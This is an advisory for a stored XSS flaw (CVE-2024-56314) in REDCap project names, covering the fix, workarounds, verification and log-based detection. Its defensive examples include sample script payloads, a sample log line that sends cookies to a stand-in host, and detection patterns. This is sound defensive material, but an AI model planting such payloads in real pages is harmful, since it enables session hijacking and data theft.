CVE-2024-56314
📋 TL;DR
This stored XSS vulnerability in REDCap allows an authenticated user to inject script into a project name. The payload is saved with the project and executes in the browser of any other user who later clicks that project name, in that user's session context, where it can read session data or issue requests as the victim. Every REDCap instance running a vulnerable version (14.9.6 and earlier, per the fix information below) that has more than one authenticated user is affected.
💻 Affected Systems
- REDCap 14.9.6 and earlier (fixed in 14.9.7)
📦 What is this software?
REDCap (Research Electronic Data Capture) is a web application for building and managing research databases and surveys, developed at Vanderbilt University and distributed to consortium member institutions, which host their own instances.
⚠️ Risk & Real-World Impact
Worst Case
An attacker who gets a REDCap administrator to click a poisoned project name could take over the administrator's session, gain full administrative control of the REDCap instance, and exfiltrate or alter sensitive research data held in it.
Likely Case
A malicious authenticated user could plant a payload that runs in other users' browsers, steal their session cookies (if those cookies are not HttpOnly) or simply act as them from within their browser, and thereby access or modify sensitive research data they are not entitled to.
If Mitigated
With proper input validation and output encoding, the payload would be rendered harmless as text rather than executable code.
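As an added illustration of the point above (this is example code, not REDCap's own source), the following shows a project-list link built by unencoded string concatenation beside the same link with context-aware output encoding. The URL path and the two attacker-controlled titles are constructed for the example; the second title targets the attribute context, which is why `quote=True` matters.

```python
import html

# Constructed attacker-controlled project titles (illustrative, not from any real incident).
PAYLOAD_TEXT_CONTEXT = "<script>alert(document.cookie)</script>"
PAYLOAD_ATTR_CONTEXT = 'Study" onmouseover="alert(document.cookie)'


def render_project_link_vulnerable(pid: int, title: str) -> str:
    """Builds the project-list link by string concatenation with no encoding.

    The title lands both inside a title="" attribute and as the link text,
    so a stored title can break out of either context.
    """
    return f'<a href="/redcap/index.php?pid={pid}" title="{title}">{title}</a>'


def render_project_link_hardened(pid: int, title: str) -> str:
    """Same markup, with the title HTML-encoded for the contexts it lands in.

    html.escape(..., quote=True) encodes < > & " and ', which covers both a
    text node and a double-quoted attribute value. pid is coerced to int so
    nothing but digits reaches the query string.
    """
    safe_title = html.escape(title, quote=True)
    return f'<a href="/redcap/index.php?pid={int(pid)}" title="{safe_title}">{safe_title}</a>'


def has_unencoded_markup(rendered: str, title: str) -> bool:
    """True when the raw title survives in the output, i.e. encoding was skipped."""
    return title in rendered


if __name__ == "__main__":
    for payload in (PAYLOAD_TEXT_CONTEXT, PAYLOAD_ATTR_CONTEXT):
        print("vulnerable:", render_project_link_vulnerable(42, payload))
        print("hardened:  ", render_project_link_hardened(42, payload))
```

Input validation on the project name (length, character set) is a useful second layer, but output encoding at the point of rendering is the control that actually neutralises the payload, and it has to match the HTML context the value is written into.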
🎯 Exploit Status
Exploitation requires an authenticated account that is allowed to set a project name, but is straightforward once that access exists: the attacker saves the payload as the name and waits for another user to click it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 14.9.7 or later
Vendor Advisory: https://www.evms.edu/research/resources_services/redcap/redcap_change_log/
Restart Required: No
Instructions:
1. Back up your REDCap instance (database and web files).
2. Download REDCap version 14.9.7 or later from the official Vanderbilt REDCap Consortium site.
3. Follow the standard REDCap upgrade procedure for your installation method (manual, Docker, etc.).
4. Verify the upgrade completed successfully (see "How to Verify" below).
🔧 Temporary Workarounds
Input Validation Web Application Firewall Rule
Add WAF rules that block XSS payloads in the request parameter carrying the project name. Treat this as a stopgap only: WAF signatures are routinely bypassed with encoding and markup variants.
# Example ModSecurity rule (project_name is a placeholder; replace it with the actual request parameter that carries the project title in your REDCap version):
SecRule ARGS:project_name "@detectXSS" "id:1001,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,deny,status:403,msg:'Possible XSS in project title'"
Temporary User Permission Restriction
Restrict project creation and project-name changes to trusted administrators only
# In the REDCap Control Center, configure project creation so that only administrators can create projects (or so that new project requests require administrator approval), and review Project Setup rights on existing projects, since those rights also allow a project's title to be changed.
🧯 If You Can't Patch
- Deploy a Content Security Policy (CSP) that disallows inline script and restricts script sources; test it in staging first, because REDCap relies on inline JavaScript and an over-strict policy will break the application. Ensure the session cookie is flagged HttpOnly and Secure, which blocks cookie theft via document.cookie even though the script can still act on the victim's behalf.
- Enable additional logging and monitoring for project creation and project-name modifications, and alert on names containing markup or script (see "Detection & Monitoring" below).
🔍 How to Verify
Check if Vulnerable:
Your instance is vulnerable if the version shown in the Control Center under 'REDCap Version Info' is 14.9.6 or earlier.
Check Version:
Check the REDCap Control Center → 'REDCap Version Info', or query the database directly: SELECT value FROM redcap_config WHERE field_name = 'redcap_version';
Verify Fix Applied:
After patching, confirm the version is 14.9.7 or later, then, in a test project, set a harmless probe title such as <b>probe</b> and confirm that wherever the project name is displayed it appears as literal text (encoded in the page source) rather than as rendered markup. Do not use a real script payload on a production instance for this check.
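An added example (not part of the advisory or of REDCap itself) of the two checks above: a version comparison that does not fall into the string-comparison trap where "14.10.0" sorts before "14.9.7", and a check of a fetched page for how a probe title came back. The page fragments are constructed stand-ins for what a project list might return before and after the fix; in practice you would pass the HTML of the real page.

```python
import html
import re

# Version that carries the fix, per the advisory above.
PATCHED_VERSION = (14, 9, 7)


def parse_version(text: str) -> tuple:
    """Parses 'major.minor.patch' (as shown in Control Center / redcap_config) into ints.

    Tuple comparison is used deliberately: comparing the strings would put
    '14.10.0' before '14.9.7'.
    """
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\s*", text)
    if not m:
        raise ValueError(f"unrecognised REDCap version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable_version(text: str) -> bool:
    """True for 14.9.6 and earlier."""
    return parse_version(text) < PATCHED_VERSION


def probe_is_encoded(page_html: str, probe_title: str) -> bool:
    """Checks a rendered page for how a probe project title came back.

    Returns True only if the raw probe is absent and its HTML-encoded form is
    present. Use a harmless probe such as '<b>probe</b>' on a test project,
    never a real script payload on production. This checks one page only;
    repeat it for every place the project name is displayed.
    """
    encoded = html.escape(probe_title, quote=True)
    return probe_title not in page_html and encoded in page_html


# Constructed fragments of what a project-list page might return for the probe
# title '<b>probe</b>' before and after the fix (illustrative only).
PROBE_TITLE = "<b>probe</b>"
UNPATCHED_FRAGMENT = '<a href="/redcap/index.php?pid=7"><b>probe</b></a>'
PATCHED_FRAGMENT = '<a href="/redcap/index.php?pid=7">&lt;b&gt;probe&lt;/b&gt;</a>'


if __name__ == "__main__":
    for v in ("14.9.6", "14.9.7", "14.10.0"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "patched")
    print("unpatched fragment encoded:", probe_is_encoded(UNPATCHED_FRAGMENT, PROBE_TITLE))
    print("patched fragment encoded:  ", probe_is_encoded(PATCHED_FRAGMENT, PROBE_TITLE))
```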
📡 Detection & Monitoring
Log Indicators:
- Project creation or project-name changes whose new name contains markup, script tags, event-handler attributes (onerror=, onmouseover=), javascript: URLs, or URL-/entity-encoded forms of these
- Project creation or renaming shortly after a burst of failed logins on the same account, which can indicate a compromised account being used to plant the payload
Network Indicators:
- Requests from users' browsers to unfamiliar external domains immediately after they view the project list or open a project (a common sign of a payload exfiltrating cookies or data)
- Unusual HTTP POST requests to the project creation or project setup endpoints, especially from accounts that rarely use them
SIEM Query:
source="redcap_logs" AND ((message="*project_name*" AND message="*<script*") OR (message="*project*" AND message="*alert(*"))
This query only matches literal, unencoded tags; extend it with patterns for encoded variants (for example "*%3Cscript*" and "*&lt;script*") and for event handlers ("*onerror=*", "*onload=*") and "*javascript:*".
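As an added example of the log-based detection described in this section (example code, not a tool shipped with REDCap), the following scans project-name change records for XSS indicators after undoing URL-encoding and HTML entities, so that payloads stored in encoded form are still caught. The log lines and their key=value format are constructed for the example and are not REDCap's native log schema; map the field names to whatever your log export uses.

```python
import html
import re
import urllib.parse

# Constructed sample log lines in a simple key=value format (not REDCap's native
# log schema). collector.example is a reserved example domain.
SAMPLE_LOG = """\
2024-12-20 10:01:02 user=alice event=PROJECT_CREATE project_title="Asthma cohort 2024"
2024-12-20 10:05:11 user=mallory event=PROJECT_UPDATE project_title="Study%3Cscript%3Efetch('https://collector.example/'%2Bdocument.cookie)%3C/script%3E"
2024-12-20 10:06:40 user=mallory event=PROJECT_UPDATE project_title="&lt;img src=x onerror=alert(1)&gt;"
2024-12-20 10:09:13 user=bob event=PROJECT_UPDATE project_title="Carry-on baggage study: onboarding=phase1"
2024-12-20 10:12:55 user=carol event=PROJECT_CREATE project_title="Nutrition & exercise (pilot)"
"""

# Indicators: script/active-content tags, known event-handler attributes, javascript: URLs.
# Handlers are listed explicitly rather than matched with on[a-z]+= so that a
# benign title such as "onboarding=phase1" (line 4 above) is not flagged.
SUSPICIOUS = re.compile(
    r"<\s*script\b"
    r"|<\s*(?:iframe|img|svg|object|embed)\b"
    r"|\bon(?:error|load|click|mouseover|mouseenter|focus|input|change|submit|toggle|animationstart)\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)
LINE = re.compile(r'user=(?P<user>\S+)\s+event=(?P<event>\S+)\s+project_title="(?P<title>[^"]*)"')


def normalise(value: str) -> str:
    """Undo URL-encoding and HTML entities (twice, to catch one layer of nesting).

    unquote_plus also turns a literal '+' into a space, which is acceptable for
    detection purposes.
    """
    for _ in range(2):
        value = html.unescape(urllib.parse.unquote_plus(value))
    return value


def find_suspicious_titles(log_text: str) -> list:
    """Returns (user, event, decoded_title) for each project title that looks like XSS."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        decoded = normalise(m.group("title"))
        if SUSPICIOUS.search(decoded):
            hits.append((m.group("user"), m.group("event"), decoded))
    return hits


if __name__ == "__main__":
    for user, event, title in find_suspicious_titles(SAMPLE_LOG):
        print(f"ALERT user={user} event={event} title={title!r}")
```

Run it over an export of project creation and project setup events; the decoded title is reported so an analyst sees the real payload rather than its encoded form, and the flagged account is the one to review for other activity.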